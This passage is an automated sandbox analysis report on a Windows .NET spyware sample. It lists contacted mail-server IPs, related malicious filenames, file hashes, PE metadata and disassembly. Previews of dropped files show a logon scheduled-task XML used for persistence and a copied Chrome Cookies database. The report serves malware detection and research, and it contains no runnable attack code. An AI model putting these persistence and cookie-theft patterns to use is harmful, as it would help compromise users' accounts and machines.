                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4019223246.exe, 00000001.00000002.658704693.0000000002C41000.00000004.00000001.sdmpfalse
                          high
                          http://qpQMsG.com4019223246.exe, 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css4019223246.exe, 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmpfalse
                            high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            208.91.198.143
                            unknownUnited States
                            394695PUBLIC-DOMAIN-REGISTRYUSfalse
                            208.91.199.224
                            unknownUnited States
                            394695PUBLIC-DOMAIN-REGISTRYUSfalse

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:358326
                            Start date:25.02.2021
                            Start time:12:15:28
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 35s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:4019223246.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@6/6@2/2
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 2.7% (good quality ratio 2.4%)
                            • Quality average: 68.5%
                            • Quality standard deviation: 33.2%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 72
                            • Number of non-executed functions: 15
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 104.43.193.48, 23.211.6.115, 168.61.161.212, 13.64.90.137, 13.88.21.125, 51.11.168.160, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 205.185.216.10, 205.185.216.42, 51.104.139.180
                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            12:16:17API Interceptor917x Sleep call for process: 4019223246.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            208.91.198.143Swift.jpg.exeGet hashmaliciousBrowse
                              1344-21-03-00079 Q N QUEUE.exeGet hashmaliciousBrowse
                                JKG Eximcon Pvt. Ltd P.O.exeGet hashmaliciousBrowse
                                  SecuriteInfo.com.Mal.Generic-S.15142.exeGet hashmaliciousBrowse
                                    ffkjg5CVrO.exeGet hashmaliciousBrowse
                                      7Lf8J7h7os.exeGet hashmaliciousBrowse
                                        Shipping Details_PDF.exeGet hashmaliciousBrowse
                                          RTM DIAS - CTM.exeGet hashmaliciousBrowse
                                            AWB & Shipping Doc.exeGet hashmaliciousBrowse
                                              SecuriteInfo.com.Artemis249E62CF9BAE.exeGet hashmaliciousBrowse
                                                inquiry.docGet hashmaliciousBrowse
                                                  BL COPY.exeGet hashmaliciousBrowse
                                                    SOA.exeGet hashmaliciousBrowse
                                                      SecuriteInfo.com.ArtemisF31D2F976320.exeGet hashmaliciousBrowse
                                                        Proforma Invoice February.exeGet hashmaliciousBrowse
                                                          133663INV.exeGet hashmaliciousBrowse
                                                            ConsoleStream.exeGet hashmaliciousBrowse
                                                              qUq5Aepd3g.exeGet hashmaliciousBrowse
                                                                GM610izIhl.exeGet hashmaliciousBrowse
                                                                  IMG-09-02-2021-OWA001-pdf.exeGet hashmaliciousBrowse
                                                                    208.91.199.224INVOICE-2101-0006N.exeGet hashmaliciousBrowse
                                                                      HcHimkU72e.exeGet hashmaliciousBrowse
                                                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                          AWB & Shipping Document.exeGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Trojan.Inject4.6572.1879.exeGet hashmaliciousBrowse
                                                                              PAYMENT INVOICE-9876543456789.exeGet hashmaliciousBrowse
                                                                                inquiry.docGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.CAP_HookExKeylogger.31203.exeGet hashmaliciousBrowse
                                                                                    SWIFT COPY 27078.exeGet hashmaliciousBrowse
                                                                                      PO 000102.xlsxGet hashmaliciousBrowse
                                                                                        Pro.invoice-0656.exeGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.ArtemisF31D2F976320.exeGet hashmaliciousBrowse
                                                                                            COMMERCIAL INVOICE BILL OF LADING ETC DOCX..exeGet hashmaliciousBrowse
                                                                                              PO-41000055885.exeGet hashmaliciousBrowse
                                                                                                Swift Mensaje 093763.exeGet hashmaliciousBrowse
                                                                                                  xbZkF2dYZz.exeGet hashmaliciousBrowse
                                                                                                    chrome.exeGet hashmaliciousBrowse
                                                                                                      statement and proforma invoice.xlsxGet hashmaliciousBrowse
                                                                                                        GM610izIhl.exeGet hashmaliciousBrowse
                                                                                                          dheivF8q0m.exeGet hashmaliciousBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            us2.smtp.mailhostbox.comSwift.jpg.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            INVOICE-2101-0006N.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            1344-21-03-00079 Q N QUEUE.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            MT SC GUANGZHOU.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            HcHimkU72e.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            MT WOOJIN CHEMS V.2103.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            AWB & Shipping Document.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            AOBO MOULD QUOTATION -1752002.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            JKG Eximcon Pvt. Ltd P.O.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            SecuriteInfo.com.Mal.Generic-S.15142.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            LIQUIDACION INTERBANCARIA 02_22_2021.xlsGet hashmaliciousBrowse
                                                                                                            • 208.91.199.223
                                                                                                            SecuriteInfo.com.Trojan.Packed2.42850.3598.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            SecuriteInfo.com.Trojan.Inject4.6572.1879.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            SWIFT Payment W0301.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            ffkjg5CVrO.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            7Lf8J7h7os.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.223
                                                                                                            Shipping Details_PDF.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            YKRAB010B_KHE_Preminary Packing List.xlsx.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225

                                                                                                            ASN

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            PUBLIC-DOMAIN-REGISTRYUSdata.xlsGet hashmaliciousBrowse
                                                                                                            • 5.100.152.162
                                                                                                            Swift.jpg.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            Claim-920537744-02082021.xlsGet hashmaliciousBrowse
                                                                                                            • 119.18.58.55
                                                                                                            Claim-920537744-02082021.xlsGet hashmaliciousBrowse
                                                                                                            • 119.18.58.55
                                                                                                            INVOICE-2101-0006N.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            logs.php.dllGet hashmaliciousBrowse
                                                                                                            • 116.206.105.72
                                                                                                            1344-21-03-00079 Q N QUEUE.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            MT SC GUANGZHOU.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            HcHimkU72e.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            MT WOOJIN CHEMS V.2103.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            AWB & Shipping Document.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Document14371.xlsGet hashmaliciousBrowse
                                                                                                            • 103.50.162.157
                                                                                                            Document14371.xlsGet hashmaliciousBrowse
                                                                                                            • 103.50.162.157
                                                                                                            AOBO MOULD QUOTATION -1752002.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.223
                                                                                                            JKG Eximcon Pvt. Ltd P.O.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            SecuriteInfo.com.Mal.Generic-S.15142.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            smartandfinalTicket#51347303511505986.htmGet hashmaliciousBrowse
                                                                                                            • 208.91.198.178
                                                                                                            f4b1bde3-706a-40d2-8ace-693803810b6f.exeGet hashmaliciousBrowse
                                                                                                            • 103.53.43.36
                                                                                                            LIQUIDACION INTERBANCARIA 02_22_2021.xlsGet hashmaliciousBrowse
                                                                                                            • 208.91.199.223
                                                                                                            PUBLIC-DOMAIN-REGISTRYUSdata.xlsGet hashmaliciousBrowse
                                                                                                            • 5.100.152.162
                                                                                                            Swift.jpg.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            Claim-920537744-02082021.xlsGet hashmaliciousBrowse
                                                                                                            • 119.18.58.55
                                                                                                            Claim-920537744-02082021.xlsGet hashmaliciousBrowse
                                                                                                            • 119.18.58.55
                                                                                                            INVOICE-2101-0006N.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            logs.php.dllGet hashmaliciousBrowse
                                                                                                            • 116.206.105.72
                                                                                                            1344-21-03-00079 Q N QUEUE.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            MT SC GUANGZHOU.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            HcHimkU72e.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            MT WOOJIN CHEMS V.2103.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            AWB & Shipping Document.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Document14371.xlsGet hashmaliciousBrowse
                                                                                                            • 103.50.162.157
                                                                                                            Document14371.xlsGet hashmaliciousBrowse
                                                                                                            • 103.50.162.157
                                                                                                            AOBO MOULD QUOTATION -1752002.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.223
                                                                                                            JKG Eximcon Pvt. Ltd P.O.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            SecuriteInfo.com.Mal.Generic-S.15142.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            smartandfinalTicket#51347303511505986.htmGet hashmaliciousBrowse
                                                                                                            • 208.91.198.178
                                                                                                            f4b1bde3-706a-40d2-8ace-693803810b6f.exeGet hashmaliciousBrowse
                                                                                                            • 103.53.43.36
                                                                                                            LIQUIDACION INTERBANCARIA 02_22_2021.xlsGet hashmaliciousBrowse
                                                                                                            • 208.91.199.223

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4019223246.exe.log
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):1314
                                                                                                            Entropy (8bit):5.350128552078965
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                                            MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                                            SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                                            SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                                            SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                                            Malicious:true
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                                            C:\Users\user\AppData\Local\Temp\tmp35E.tmp
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1644
                                                                                                            Entropy (8bit):5.1910277324869165
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGAYtn:cbhK79lNQR/rydbz9I3YODOLNdq3G
                                                                                                            MD5:0436449A8A29D6DDCE3A32F0AFEC9F86
                                                                                                            SHA1:1BA25B0B13158E49344283743E476A5583B7110D
                                                                                                            SHA-256:274CF49E1C8DB4264092964FF5D604E47F20D0F93C5E4C62E4B728EBB8843506
                                                                                                            SHA-512:5DEFAA4B15AD8D4A7BCD2710381B82E9EFC68FC97BB1897BC96B3E4D3DE0227E57A98925D384B9182944C8738657C68533AB40B7CE01992E6094F9DDE91AC640
                                                                                                            Malicious:true
                                                                                                            Reputation:low
                                                                                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                                                            C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exe
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):981504
                                                                                                            Entropy (8bit):7.118177937126348
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:CVsJT2fy3BWYR+nwvQILyPB+A+9JqWqi7jDB:ouB0wvngN+Dqg7
                                                                                                            MD5:87E6882BCEBF4823AFB4303AAC3628B1
                                                                                                            SHA1:FA6DF79DD667FCBB97C6FFBF947EE356512B292D
                                                                                                            SHA-256:369D92B64EE7B40F1679B98499E6D2B3470F9D477A8C35256508AE5715516194
                                                                                                            SHA-512:87F490512C0984C98EEDFAF34D97CF8FD7018A4ACE412DF73D61B1274034BCD87BC5B69956125687816AD77CF57951CA656608987233A79858BA0361A1F6890E
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                                            Reputation:low
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r7`..............P......T........... ........@.. .......................`............@.....................................K........R...................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc....R.......R..................@..@.reloc.......@......................@..B........................H.......8C...~..............8............................................0..#.......+.&...(....(..........(.....o.....*..................0..#.......+.&..8......8.....+e..Ta.+...Pa...VXE........@...M...]....T(.....+...QXE....'...;...D...R...a...j...s..................+..R(........+......&.U(.....+.8y.....(.....P(.....8e.......8\........&...8N.....(.......8?.......86.......8-.....(....+.(....8.......8........8......(....+..8.......8....*..0..........+.&...+>..Sa.+...Oa8{.....VX
                                                                                                            C:\Users\user\AppData\Roaming\WZXjvtGBEKK.exe:Zone.Identifier
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                                            C:\Users\user\AppData\Roaming\o20cyjeo.lhs\Chrome\Default\Cookies
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.7006690334145785
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                                            MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                                            SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                                            SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                                            SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Windows\assembly\Desktop.ini
                                                                                                            Process:C:\Users\user\Desktop\4019223246.exe
                                                                                                            File Type:Windows desktop.ini, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):227
                                                                                                            Entropy (8bit):5.2735028737400205
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:a1eZBXVNYTF0NwoScUbtSgyAXIWv7v5PMKq:UeZBFNYTswUq1r5zq
                                                                                                            MD5:F7F759A5CD40BC52172E83486B6DE404
                                                                                                            SHA1:D74930F354A56CFD03DC91AA96D8AE9657B1EE54
                                                                                                            SHA-256:A709C2551B8818D7849D31A65446DC2F8C4CCA2DCBBC5385604286F49CFDAF1C
                                                                                                            SHA-512:A50B7826BFE72506019E4B1148A214C71C6F4743C09E809EF15CD0E0223F3078B683D203200910B07B5E1E34B94F0FE516AC53527311E2943654BFCEADE53298
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview: ; ==++==..; ..; Copyright (c) Microsoft Corporation. All rights reserved...; ..; ==--==..[.ShellClassInfo]..CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}..ConfirmFileOp=1..InfoTip=Contains application stability information...

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.118177937126348
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                            File name:4019223246.exe
                                                                                                            File size:981504
                                                                                                            MD5:87e6882bcebf4823afb4303aac3628b1
                                                                                                            SHA1:fa6df79dd667fcbb97c6ffbf947ee356512b292d
                                                                                                            SHA256:369d92b64ee7b40f1679b98499e6d2b3470f9d477a8c35256508ae5715516194
                                                                                                            SHA512:87f490512c0984c98eedfaf34d97cf8fd7018a4ace412df73d61b1274034bcd87bc5b69956125687816ad77cf57951ca656608987233a79858ba0361a1f6890e
                                                                                                            SSDEEP:24576:CVsJT2fy3BWYR+nwvQILyPB+A+9JqWqi7jDB:ouB0wvngN+Dqg7
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r7`..............P......T........... ........@.. .......................`............@................................

                                                                                                            File Icon

                                                                                                            Icon Hash:e0dad4adc4d2d870

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4ec21e
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                            Time Stamp:0x603772F4 [Thu Feb 25 09:50:44 2021 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

